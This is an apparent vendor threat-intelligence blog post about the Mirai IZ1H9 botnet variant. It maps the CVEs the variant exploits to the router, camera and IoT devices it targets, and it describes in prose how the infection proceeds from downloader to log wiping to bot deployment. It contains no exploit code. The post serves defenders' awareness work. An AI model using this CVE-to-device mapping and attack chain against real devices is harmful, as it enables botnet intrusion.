The PolySwarm Blog

Analyze suspicious files and URLs, at scale, millions of times per day. Get real-time threat intel from a crowdsourced network of security experts and antivirus companies competing to protect you.

Mirai IZ1H9

Oct 16, 2023 2:17:16 PM / by The Hivemind


Executive Summary

Mirai IZ1H9, a newer variant of Mirai, is being used to infect Linux devices for use in a DDoS campaign.

Key Takeaways

  • Mirai IZ1H9, a newer variant of Mirai,  is being used to infect Linux devices for use in a DDoS campaign.
  • Mirai IZ1H9 is known to leverage at least thirteen different payloads, using recently released exploit code, including a number of CVEs. 
  • The CVEs used in this campaign are noted in this report.

What is Mirai IZ1H9?

FortiGuard Labs recently reported on Mirai IZ1H9, which is being used to infect devices for use in a DDoS campaign. It affects Linux devices, particularly IoT devices.

Mirai IZ1H9 is known to leverage at least thirteen different payloads, using recently released exploit code, including a number of CVEs. Some of the CVEs were discovered as recently as this year. 

IZ1H9 has been observed targeting a variety of Linux-based devices including D-link devices, Netis routers, Sunhillo SureLine, Geutebruck IP cameras, Yealink Device Management, Zyxel devices, TP-Link Archer, Korenix Jetwave, TOTOLINK routers.

The CVEs exploited by IZ1H9 include the following:

CVE-2015-1187, CVE-2016-20017, CVE-2020-25506, CVE-2021-45382
CVE-2015-1187, CVE-2016-20017, CVE-2020-25506, and CVE-2021-45382 are critical severity vulnerabilities that allow threat actors to use a crafted request to deliver command injection. These CVEs affect D-Link devices.

CVE-2019-19356 affects Netis WF2419 and exploits an RCE vulnerability through tracert. This vulnerability exists due to a lack of user input sanitizing.

CVE-2021-36380, CVE-2021-33544/33548/33549/33550/33551/33552/33553/33554, CVE-2021-27561/27562
CVE-2021-36380, CVE-2021-33544/33548/33549/33550/33551/33552/33553/33554, and CVE-2021-27561/27562 affect Sunhillo, Geutebruck, and Yealink devices and allow arbitrary command execution.

CVE-2023-1389 is a command injection vulnerability affecting TP-Link Archer AX21 (AX1800).

CVE-2023-23295 is a command injection vulnerability affecting Korenix JetWave wireless AP.

CVE-2022-40475/25080/25079/25081/25082/25078/25084/25077/25076/38511/25075/25083 are vulnerabilities affecting TOTOLINK routers.

Other Vulnerabilities

IZ1H9 also leverages an exploit targeting Zyxel device’s /bin/zhttpd/ component vulnerability. In absence of sufficient input validation, a threat actor can exploit the vulnerability to launch an RCE attack.

FortiGuard Labs also noted an additional exploit payload that targets unknown devices. It appears to be very similar to a vulnerability affecting Prolink PRC2402M routers.

Once the payload is injected, it retrieves a shell script downloader from the C2. When the script is executed, it deletes logs in an attempt to cover its tracks then downloads and executes multiple bot clients targeting a variety of Linux architectures.

For the last step, the shell script downloader obstructs network connections on multiple ports by altering the devices’s iptables rules. The infected device is leveraged as one of many in the botnet.


PolySwarm has multiple samples of IZ1H9.










You can use the following CLI command to search for all xx samples in our portal:

$ polyswarm link list -f IZ1H9


Don’t have a PolySwarm account? Go here to sign up for a free Community plan or to subscribe.

Contact us at | Check out our blog Subscribe to our reports.


Topics: Threat Bulletin, Linux, IoT, Mirai, Botnet, IZ1H9

The Hivemind

Written by The Hivemind

Subscribe to Email Updates

Lists by Topic

see all

Posts by Topic

See all

Recent Posts